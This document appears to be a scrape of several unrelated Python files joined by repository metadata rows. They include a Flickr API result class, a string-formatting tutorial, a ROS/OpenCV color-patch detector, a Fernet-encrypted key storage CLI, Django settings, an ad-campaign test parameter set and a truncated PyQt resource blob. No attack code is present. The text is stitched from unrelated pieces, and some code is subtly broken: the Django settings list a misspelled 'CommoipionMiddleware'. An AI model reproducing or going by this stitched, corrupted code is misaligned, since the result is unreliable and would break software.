class FindByKeywordResultSet(ResultSet):
"""
A ResultSet with methods tailored to the values returned by the FindByKeyword Choreo.
The ResultSet object is used to retrieve the results of a Choreo execution.
"""
def getJSONFromString(self, str):
return json.loads(str)
def get_Response(self):
"""
Retrieve the value for the "Response" output from this Choreo execution. (The response from Flickr.)
"""
return self._output.get('Response', None)
class FindByKeywordChoreographyExecution(ChoreographyExecution):
def _make_result_set(self, response, path):
return FindByKeywordResultSet(response, path)
| [
"dattasaurabh82@gmail.com"
] | dattasaurabh82@gmail.com |
51c528349ae5eff94470ab12a4bdbfcaee39eb2e | 39e5ba31a0b0389ebdd787231b05c58ad1f50aac | /6-输入与输出/1.字面量.py | fd88bc9bd8959244859538d7ebd647d7359d9f8c | [] | no_license | yicg/python_demo | 19f7f428bcf61c92cadf4469d89fb88e8fb84c30 | bcf9819ab21f8e28af5de4447a52a8c655d02278 | refs/heads/master | 2023-03-26T19:08:56.173250 | 2021-03-25T09:58:37 | 2021-03-25T09:58:37 | 343,789,074 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 737 | py | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""
@Author :yicg
@Time : 2021/2/18 下午2:16
@Version : 1.0
@Description :
"""
#1.格式化输出
name='lili'
age=20
print("my name is {},age is {}".format(name,age)) #my name is lili,age is 20
print("======================")
name_list=['zhangsan','lisi','wangwu']
print("my name is {},{},{}".format(*name_list)) #可以传列表、字典等,但是要解包 my name is zhangsan,lisi,wangwu
print("======================")
print(f"name is {name}",name_list) #推荐使用f,无需解包 name is lili ['zhangsan', 'lisi', 'wangwu']
print(f"name is {name}",*name_list) #推荐使用f,也可以解包 name is lili zhangsan lisi wangwu
print("======================")
| [
"yichunguangyx@163.com"
] | yichunguangyx@163.com |
75db8c0b74e36ae5d402823fe9e9d389fa1c33b4 | adc8c698d282cb6100560b22744c349fd2b471d2 | /src/PB_5917_Final_Task/5917_ip.py | 7cf9973082b9e31f6ad1d78621c8869c3f3d5904 | [] | no_license | atharvakarpate/E_Yantra_2019 | 468e4372ee131008ad62d292482a80b0a29f8910 | a02fd6ff6032527e12736b3c7d02c84d7377c8b5 | refs/heads/main | 2023-08-21T05:30:09.157633 | 2021-10-29T00:23:23 | 2021-10-29T00:23:23 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,159 | py | #!/usr/bin/env python
"""
* Id : 5917
* Author : Atharva Karpate
* Filename: task_3_ip.py
* Theme: Pollinator Bee
* Functions: __init__,image_callback,Colorno
* Global Variables: red(Stores number of red Contours),redC(Stores the BGR value of red)
green(Stores number of green Contours),greemC(Stores the BGR value of green)
blue(Stores number of blue Contours),blueC(Stores the BGR value of blue)
* Description: Image processing for multiple waypoints(pollinations).
"""
import rospy, cv2, cv_bridge
import numpy as np
from sensor_msgs.msg import Image
from geometry_msgs.msg import Twist
from geometry_msgs.msg import PoseArray
from std_msgs.msg import Int32
from std_msgs.msg import Float64
red = 0
green = 0
blue = 0
redC = (0, 0, 255)
greenC = (0, 255, 0)
blueC = (255, 0, 0)
class ColorDetect:
"""
* Function Name: __init__
* Input: None(self)
* Output: Provides whycon/image_out and initialises ros_bridge
* Logic: Subscribes to whycon/image_out via ros_bridge
* Example Call: As soon as object is decalared.
"""
def __init__(self):
self.red = 0
self.green = 0
self.blue = 0
self.b = 0
rospy.init_node("ros_bridge")
# self.img= np.zeros((1,2,3),np.uint8)
rospy.sleep(0.1)
# Create a ROS Bridge
self.ros_bridge = cv_bridge.CvBridge()
self.pub = rospy.Publisher("red", Float64, queue_size=1000)
self.pub1 = rospy.Publisher("blue", Float64, queue_size=1000)
self.pub2 = rospy.Publisher("green", Float64, queue_size=1000)
self.pub3 = rospy.Publisher("points", Float64, queue_size=1000)
# Subscribe to whycon image_out
self.image_sub = rospy.Subscriber(
"/usb_cam/image_rect_color", Image, self.image_callback
)
self.pub = rospy.Publisher(
"red", Float64, queue_size=1000
) # Publisher for red Topic
self.points = []
"""
* Function Name:image_callback
* Input: msg
* Output: Provides openCv frame from ros image message
* Logic: Converts ros image message to openCv frame via ros_bridge.imgmsg_to_cv2(msg, desired_encoding='bgr8')
* Example Call: image_callback(msg)
"""
def image_callback(self, msg):
# 'image' is now an opencv frame
# You can run opencv operations on 'image'
self.image = self.ros_bridge.imgmsg_to_cv2(msg, desired_encoding="bgr8")
self.img = self.image # self.image is stored in self.img
"""
* Function Name:DetectColor
* Input: None(self)
* Output: Stores the number of red,green and blue patches in their respective variables
* Logic: First blurs the image ,then converts in to hsv . Calls function colorno to detect the number of squares of the particular number
* Example Call: DetectColor()
"""
def DetectColor(self):
redC = (0, 0, 255)
greenC = (0, 255, 0)
blueC = (255, 0, 0)
self.blur = cv2.medianBlur(self.img, 5) # To blur the image to reduce noise
self.hsv = cv2.cvtColor(self.blur, cv2.COLOR_BGR2HSV) # conversion to hsv
lower_blue = np.array([97, 51, 227])
upper_blue = np.array([143, 198, 253])
lower_red = np.array([135, 47, 227])
upper_red = np.array([211, 255, 255])
lower_green = np.array([30, 61, 190])
upper_green = np.array([80, 153, 255])
# Provides with the number of color squares and stores in red,green and blue respectively.
self.Colorno(lower_red, upper_red, redC)
self.Colorno(lower_green, upper_green, greenC)
self.Colorno(lower_blue, upper_blue, blueC)
self.DrawPub(self.points)
"""
* Function Name:DrawPub
* Input: points
* Output: Draws rectangles(contours) and publishes the values of red, blue, green and points
* Logic: Draws rectangle using rectangle fucntion of detected colour
* Example Call: DetectColor()
"""
def DrawPub(self, points):
self.red = 0
self.green = 0
self.blue = 0
for x in range(0, len(points)):
cv2.rectangle(
self.img,
(points[x][0] - 15, points[x][1] - 15),
(points[x][0] + 15, points[x][1] + 15),
points[x][2],
2,
)
if points[x][2] == (0, 0, 255):
self.red += 1
elif points[x][2] == (0, 255, 0):
self.green += 1
elif points[x][2] == (255, 0, 0):
self.blue += 1
self.pub.publish(self.red)
self.pub1.publish(self.blue)
self.pub2.publish(self.green)
self.pub3.publish(len(points))
"""
* Function Name: Colorno
* Input: lower,upper,color
* Output: Returns the number of contours of the 'color' provided . Also draws rectanlges of that color around that contour.
* Logic: Extracts the required color from 'lower' and 'upper' followed by erosion and then closing. Then contour is found using
findContours() fucntion and a rectangle is drawn around the centroid.
* Example Call: Colorno([97,51,227],[143,198,253],(255,0,0))
"""
def Colorno(self, lower, upper, color):
self.mask = cv2.inRange(
self.hsv, lower, upper
) # Extraction from the lower-upper range
kernel = cv2.getStructuringElement(cv2.MORPH_ELLIPSE, (3, 3))
erode = cv2.erode(
self.mask, kernel, iterations=1
) # Eroded to remove white noise as well as to stop the detection of blue from whycon coordinates in whycon/image_out.
dilation = cv2.dilate(
erode, kernel, iterations=16
) # To join diffrent detected segments of the same petal in one segment to draw rectangle.
self.closing = cv2.erode(dilation, kernel, iterations=1)
abc, contours, hierarchy = cv2.findContours(
self.closing, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE
)
# To find contour centroid
for x in range(0, len(contours)):
M = cv2.moments(contours[x])
cx = int(M["m10"] / M["m00"])
cy = int(M["m01"] / M["m00"])
# print "Centroid = ", cx, a", ", cy
# cv2.circle(img,(cx,cy), 3, (127,127,127), -1)
if len(self.points) > 0:
self.b = 0
for x in range(0, len(self.points)):
difx = abs(cx - self.points[x][0])
dify = abs(cy - self.points[x][1])
if (difx > 40) or (dify > 40):
self.b += 1
if self.b == len(self.points):
self.points.append([cx, cy, color])
else:
self.points.append([cx, cy, color])
if __name__ == "__main__":
test = ColorDetect()
rospy.sleep(2)
red = 0
blue = 0
green = 0
flag = 0
while True:
test.DetectColor()
cv2.imshow("image", test.img)
cv2.waitKey(1)
cv2.destroyAllWindows()
rospy.spin()
| [
"atharvakarpate@gmail.com"
] | atharvakarpate@gmail.com |
87d4a703cd60d8776b09c67b7e09adbf576a56ae | 5e2fc6d87f9c70bfd9c51daa29408d49796da7ce | /keylocker/__init__.py | 616eaa792ea408b5bc33773e17dd1531d548a021 | [] | no_license | vpuhoff/keylocker | cf2d9b6f028e190a32a0d056514f142a8b391b38 | 6134df1ee3c4c0c521f47d56d57a466b93212ae2 | refs/heads/master | 2023-09-01T08:56:39.085789 | 2021-02-10T06:48:52 | 2021-02-10T06:48:52 | 194,481,376 | 3 | 0 | null | 2023-08-01T22:58:12 | 2019-06-30T06:05:20 | Python | UTF-8 | Python | false | false | 2,835 | py | import pickledb
import fire
from cryptography.fernet import Fernet, InvalidToken
class Storage(object):
def __init__(self, filename='secrets.json', key_file='storage.key', key=None):
self.db = pickledb.load(filename,True)
try:
if not key:
with open(key_file,'rb') as keyfile:
key = keyfile.read()
self.fernet = Fernet(key)
except FileNotFoundError as e:
print('ERROR: Key file not found!')
def __setitem__(self, key, value):
self.db[key] = self.fernet.encrypt(str(value).encode()).decode()
def __getitem__(self, key):
try:
raw= self.db[key]
if raw:
raw = str(raw)
return self.fernet.decrypt(raw.encode()).decode()
else:
print('ERROR: Key not found')
exit(999)
except InvalidToken as e:
print('ERROR: Invalid key file!')
exit(999)
except FileNotFoundError as e:
print('ERROR: Key file not found!')
exit(999)
def keys(self):
return self.db.getall()
from . import Storage
import fire
class Manager(object):
def __init__(self):
self.storage = Storage()
#return super().__init__()
def init(self):
import base64
import os
from cryptography.fernet import Fernet
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
key = Fernet.generate_key()
longpass = key
salt = os.urandom(16)
kdf = PBKDF2HMAC(
algorithm=hashes.SHA256(),
length=32,
salt=salt,
iterations=100000,
backend=default_backend()
)
key = base64.urlsafe_b64encode(kdf.derive(longpass))
with open('storage.key','wb') as f:
f.write(key)
return 'storage.key'
# key = Fernet.generate_key()
# return (key.decode())
def write(self,key, value):
self.storage[key]=value
return 'OK'
def remove(self,key):
if key =='*':
for key,value in self.storage.db.dgetall():
self.storage.db.drem(key)
else:
try:
self.storage.db.drem(key)
return 'OK'
except KeyError as e:
print('ERROR: Key not found')
exit(888)
def read(self,key):
return self.storage[key]
def list(self):
for item in list(self.storage.keys()):
print(item)
def main():
fire.Fire(Manager, name='keylocker')
if __name__ == "__main__":
main() | [
"vpuhoff@live.ru"
] | vpuhoff@live.ru |
e006c474da9752e4dc45b6db91e3485f58e9b8b6 | 048e8b68e5c5f447bea15f0932d06dd7e8b0bba0 | /BBS/settings.py | 9832763d9fa61bae620c1843e30fc400bf309604 | [] | no_license | jszccdp/BBS | 8f5f85c68e3bf5f814ea9b16c4e3c293edf5db5e | 8616c68d0a602b664b5850c5cf58618a10fc2532 | refs/heads/master | 2020-04-26T22:42:40.849583 | 2019-03-06T09:28:07 | 2019-03-06T09:28:07 | 173,880,799 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,628 | py | """
Django settings for BBS project.
Generated by 'django-admin startproject' using Django 2.1.7.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
from decouple import config
from decouple import Csv
import dj_database_url
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
#SECRET_KEY = 'hk4a-wn_k#a)*kyd#_#0&9mhzfnm6_fuyz&e+6d+tx#5ybx_c0'
SECRET_KEY=config('SECRET_KEY')
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = config('DEBUG',default=False,cast=bool)
ALLOWED_HOSTS = config('ALLOWED_HOSTS',cast=Csv())
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'boards',
'widget_tweaks',
'accounts',
'boards.templatetags.form_tags',
'boards.templatetags.gravatar',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommoipionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'BBS.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'BBS.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default':dj_database_url.config(
default=config('DATABASE_URL')
)
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'zh-hans'
TIME_ZONE = 'Asia/Shanghai'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS=[
os.path.join(BASE_DIR,'static'),
]
LOGOUT_REDIRECT_URL='home'
LOGIN_REDIRECT_URL = 'home'
EMAIL_BACKEND = 'django.core.mail.backends.console.EmailBackend'
LOGIN_URL = 'login' | [
"1162219262@qq.com"
] | 1162219262@qq.com |
96b7ae9b557800edf96fa234ccdc6c5e23c59dea | 1125345341e496920b661e612cd67cdb96a1d170 | /createCampaign/parameter_tests/CREATIVE_NAME/test02_valid_p.py | 4718d851e9cdc50ac51047f4f44e5f3ae48e305b | [] | no_license | Stephen-Williams/swarm-qa | 0bac526f0ee44b8c3677fb35959e6f7d0e258be2 | 90e36b5eab475788d9ab54051ad9c2736f3633ec | refs/heads/master | 2021-01-01T20:11:51.033059 | 2015-07-08T16:07:06 | 2015-07-08T16:07:06 | 38,764,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,678 | py | { 'all':
{ '0':
{ 'ADOMAIN': 'abc.com',
'ADVERTISER_CATEGORY': 'IAB8-5',
'APP_FILTER': 'sites',
'CREATIVE_ATTR': '0',
'CREATIVE_BASE_64': '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',
'CREATIVE_HEIGHT': 50,
'CREATIVE_NAME': 'Creative Name.png',
#CREATIVE_NAME is valid
'CREATIVE_TYPE': '3',
'CREATIVE_WIDTH': 320,
'DAY_PARTING': '111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111',
'DELIVERY_RATE_UNIT': 'impressions',
'ENCODE_A_HREF': 0,
'START': 1433908800, #June 10th 2015, midnight
'END': 1434513599, #June 16th 2015, 23:59:59
'EXCHANGE': 'mpb',
'LANG': 'en',
'LOCATIONS': ['CAN', 'USA'],
'MAX_RATE_IN_DOLLARS': 0.8,
'MPB_TYPE': '',
'NECTAR_ALLOCATION': 9602,
'NECTAR_CRID': 9602,
'QUANTITY': '1000000',
'TARGET_ANDROID': True,
'TARGET_IOS': True,
'SITE_LIST': ['0c3e797b933649ab84619d8e8a1c0ab6',
'07ab13ce6ae511e281c11231392559e4',
'f8289871fe0d48318d36bf3ea197f65d',
'bd80deae924f11e281c11231392559e4'],
'TAG': '<A HREF="http://ad.foobar.net/ddm/jump/N6041.368591.JUICEMOBILE.CA/B8760366.118973391;sz=728x90;ord=[NECTAR_TIME]?">\r\n'
'<IMG SRC="http://ad.foobar.net/ddm/ad/N6041.368591.JUICEMOBILE.CA/B8760366.118973391;sz=728x90;ord=[NECTAR_TIME]?" '
'BORDER=0 WIDTH=728 HEIGHT=90 '
'ALT="Advertisement"></A>'
}
}
}
| [
"stephen.williams@juicemobile.com"
] | stephen.williams@juicemobile.com |
864174abe531accd7b988c0891e93ed7128e2c7f | 859cfe4db3d1c42a0a17423ae86742726d15e642 | /Task3.py | 2a488b395a434a32c6f3cf76258a74108a6cc47c | [] | no_license | GQ312/Chapter1-Part2 | fd15d79792c61fc036dc806bc42e149c777eeea4 | 696fa7c3a46e79ba83b1d77530f7bcce815e2027 | refs/heads/master | 2021-03-06T21:24:39.322369 | 2020-03-10T05:03:11 | 2020-03-10T05:03:11 | 246,224,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 123 | py | num = int(input("Write your number: "))
print("Next number: " + str((num - 1)))
print("Previous number: " + str((num + 1))) | [
"nurbolot0312@gmail.com"
] | nurbolot0312@gmail.com |
cf1c7ed666e3e2ffefa00c4742ed5302dc0b15bd | 8f580f80eae1f947ebb3fed099a996ba961dfe95 | /view/resources_rc.py | 7179cf4a2b5a045727fb4f05db70fd80865c4d6c | [] | no_license | ankhbold/sesmim_training | 45efb172b8269708cc4a352fa944a5c2b35936a1 | 162ba8fe798c565fbd46f6b5f06f0d8aa17d2962 | refs/heads/master | 2020-04-28T08:01:02.805373 | 2019-03-19T00:34:19 | 2019-03-19T00:34:19 | 175,111,543 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,103 | py | # -*- coding: utf-8 -*-
# Resource object code
#
# Created by: The Resource Compiler for PyQt4 (Qt v4.8.7)
#
# WARNING! All changes made in this file will be lost!
from PyQt4 import QtCore
qt_resource_data = "\
\x00\x00\x06\xa7\
\x89\
\x50\x4e\x47\x0d\x0a\x1a\x0a\x00\x00\x00\x0d\x49\x48\x44\x52\x00\
\x00\x00\x20\x00\x00\x00\x20\x08\x06\x00\x00\x00\x73\x7a\x7a\xf4\
\x00\x00\x00\x01\x73\x52\x47\x42\x00\xae\xce\x1c\xe9\x00\x00\x00\
\x04\x67\x41\x4d\x41\x00\x00\xb1\x8f\x0b\xfc\x61\x05\x00\x00\x00\
\x09\x70\x48\x59\x73\x00\x00\x0e\xc4\x00\x00\x0e\xc4\x01\x95\x2b\
\x0e\x1b\x00\x00\x06\x3c\x49\x44\x41\x54\x58\x47\xd5\x57\x09\x6c\
\x94\x45\x14\xfe\x76\xb7\xbb\xdb\xed\x6e\xb7\xf7\xdd\xd2\x83\x80\
\x50\xac\x5c\x2d\x50\x48\x53\x11\xac\x20\x68\x50\x23\x04\x30\x96\
\x43\xb4\x82\x07\xd1\x28\xda\x20\x42\x62\x8a\xa6\x68\xc1\x40\x01\
\xc5\x03\x42\x21\x02\xc5\x88\xd8\x16\x0a\x85\x26\xdc\x5d\xa0\xa4\
\xb4\x50\x28\x3d\xe8\xb5\xdb\x8b\xde\xdd\x7b\x7d\x33\xdd\xca\x6e\
\x8f\x85\x48\x90\xf8\x6d\x9a\x7f\xfe\xf9\xdf\xcc\xfb\xe6\xcd\xf7\
\xde\x4c\x05\xc9\xf9\x33\x2c\x78\x82\x10\x5a\x9f\x4f\x0c\xff\x1f\
\x02\x26\x8b\x11\x3a\x63\x37\xba\x0d\xed\xe8\x32\xb4\xf1\x27\x7b\
\x67\xfd\x8f\x82\x07\x6a\xc0\x64\x36\xa2\x5d\xdf\x0c\x6f\x59\x30\
\xa2\xfd\x67\x23\xc4\x75\x34\x64\x62\x05\x11\xe8\x40\x75\xc7\x4d\
\xa8\xd4\xd9\x68\xee\xa9\x81\x52\xe2\x05\x91\xd0\xc9\x3a\xca\x1e\
\x16\x8b\x19\x06\xb3\x9e\xb5\x20\x11\xc9\x7a\x3b\xad\x70\x48\x80\
\x39\x61\x13\xaf\x9c\x90\x0e\x3f\x79\x18\xef\x33\xd3\x64\x6d\xba\
\x06\xb8\x49\x7d\x21\x14\xf4\x06\xb0\xa1\xab\x0a\xdb\xae\xae\x44\
\xbb\xae\x11\x2e\x62\x25\x8f\x8c\xd1\x62\xe0\xe4\x75\xa6\x2e\x28\
\xc4\x9e\x98\xe0\x97\x00\x77\x67\x7f\xe4\x57\x67\xd8\x91\x18\x92\
\x40\xbb\xae\x09\x53\x03\x5f\xc5\xc2\x31\xeb\xf8\xfb\xfe\x92\xaf\
\x70\xb6\x36\x93\x26\xd5\xc1\x49\x28\x81\xde\xac\xa5\x05\x09\x30\
\x35\xe8\x15\x24\x46\xa5\x70\x9b\xdf\x6e\xa4\x20\xb7\xf2\x67\x2c\
\x8a\xdc\x00\x1f\x97\x60\x1e\xb5\x00\xc5\x70\xfe\x8d\x11\xcf\xab\
\xda\x83\xec\xf2\x9d\x70\x76\x92\xf3\x3e\x86\x41\x35\xc0\xf6\x37\
\x36\xa8\xd7\xf9\xcd\xe6\x8b\x78\x27\x67\x14\x2e\xab\xb3\xe0\x2a\
\xf1\x80\x5c\xe2\xce\xf7\xdd\x4d\xe2\x47\x36\xf3\x20\x17\xbb\x61\
\xe1\x11\x6f\x14\x37\x9e\xc1\x82\xd1\xc9\x98\x3e\xec\x0d\x14\x6a\
\x72\x11\xe5\x13\xcf\x9d\x5f\xac\x3b\x8a\xf3\xb5\x47\x78\xb4\x4a\
\x9a\xce\x12\x79\xb1\xd5\x4b\x2f\x06\x44\x80\x85\x4d\x2a\x72\xc1\
\x86\xb8\x2c\x72\x7e\x01\x9b\x2e\x2d\x86\xaf\x4b\x18\x39\x35\xa0\
\x43\xd7\x8c\x84\xf0\x15\x88\x0f\x59\x08\x0f\x99\x9f\x75\x04\x70\
\x55\x7d\x12\x69\xaa\x44\x7c\x3a\x79\x3f\x9e\xf6\x89\xc3\x27\xa7\
\xa6\x91\xcd\x22\xdc\x6a\xb9\x44\xa4\xd6\x22\xc8\x75\x04\xb7\x4b\
\x3a\x16\x09\x4f\xe7\x00\x08\x04\x02\xfe\xce\x30\x20\x02\x4c\x70\
\xab\x26\xee\xe0\xed\xef\x0a\x12\xb9\x73\xbd\xb9\x87\x56\xef\x8d\
\xf4\x17\x8a\x31\x6f\xe4\x6a\x94\xb6\x5c\xe0\xdf\x19\xb4\xb4\xdf\
\x62\x27\x09\xf6\xcc\xad\x41\xca\xf9\xd7\x78\xdf\x9a\x29\x07\xb0\
\xaf\x64\x03\x3e\x9a\xb4\xfb\x1f\xe7\xb7\x5b\x54\xb4\x30\x99\x9d\
\x73\x06\x3b\x02\x6c\xf5\x3e\xb2\x10\x72\x3a\x0c\x19\xc5\xeb\xb9\
\x00\x7b\xc3\xed\x8b\xb5\x53\x0f\x73\x9b\xfa\xce\x72\x3b\xb5\xb7\
\xea\x34\xb8\x46\x11\x48\xce\x9f\x09\x7f\x79\x04\xf6\x5e\x5f\x47\
\x7b\x1f\xc4\xdb\x15\xad\x45\x56\x2b\x20\xef\xee\x5e\x1e\xd9\xfe\
\xb0\x23\x60\x20\x81\xc5\x04\xcc\xe1\x6d\x26\x38\xa6\xd6\x56\x52\
\x7c\x72\xec\x21\xde\xc7\xe0\x45\x93\xd7\x75\xdc\xe6\xed\xcc\x9b\
\xa9\xf8\x5e\xb5\x02\x5e\x2e\x41\x48\x89\x3f\x81\xa4\xf1\x5b\x91\
\x53\xf1\x03\xff\x16\x17\x3c\x1f\xa7\xef\x66\xf0\xb6\xc9\x6c\x22\
\x0d\x65\x43\x2c\x92\xf2\x77\x5b\xd8\x11\x30\xd3\x6a\x43\x94\x91\
\x94\x46\xa4\x70\xca\x59\x96\x4a\x63\x7d\x9e\xb3\x5b\xf1\xdd\xf6\
\x62\x1c\x28\xfd\x1a\x1b\xcf\xcf\x87\xa7\x2c\x90\xd4\x3e\x0c\xb3\
\x22\x56\xf0\x6f\x23\x3d\xa3\x49\x94\x9e\xe8\x31\x74\x21\xd4\x6d\
\x0c\x15\xac\x56\xde\xbf\xb3\xf0\x43\xb8\x53\xda\x0e\x86\x7e\x04\
\x2c\x3c\xec\x6d\x14\x56\xa6\x56\x23\x15\x8f\x71\xbe\x33\xf9\xb7\
\x93\x95\x7b\xb0\xe6\x74\x3c\x8a\x1a\xf3\x91\xf1\x92\x1a\x9f\xc7\
\x1e\xc0\xf4\xd0\xc5\x78\x7b\x6c\x1a\x36\x17\x2c\xc7\x35\x4d\x1e\
\xb7\x0b\x24\xe5\xb7\xe9\x1b\xa0\x94\x7a\xd3\x78\x03\x45\xab\x0c\
\x45\x4d\xa7\x06\x5d\x3d\x83\x1d\x01\x26\x90\x4e\xfd\x3d\x1a\xec\
\x43\x83\x8d\x10\x09\x9c\xd0\x44\x55\x6e\x59\x56\x38\xb4\xa6\x6e\
\xe8\x29\x32\x13\xfd\x67\x59\xad\x7b\x21\x97\xb8\x61\x75\xcc\x4f\
\xf0\xa5\x42\x55\x50\x9f\x85\x16\x6d\x3d\x5c\xc5\x5e\xbc\x88\x69\
\xa9\x08\x7d\x5b\xf0\x26\x3c\xa4\xfe\x56\xeb\x81\xb0\x23\xc0\x1c\
\xd6\x50\x79\x75\x76\x72\xe1\xe5\xd3\x42\xbf\xb3\xb5\x87\xb0\x6b\
\xf6\x1d\xcc\x19\x9e\x84\xb4\x99\x17\xb1\xbb\xe8\x33\x9c\xa8\xfc\
\xd5\x3a\xe2\x3e\x02\x14\x11\xa4\x9f\x17\x51\xd7\x79\x8b\x48\x29\
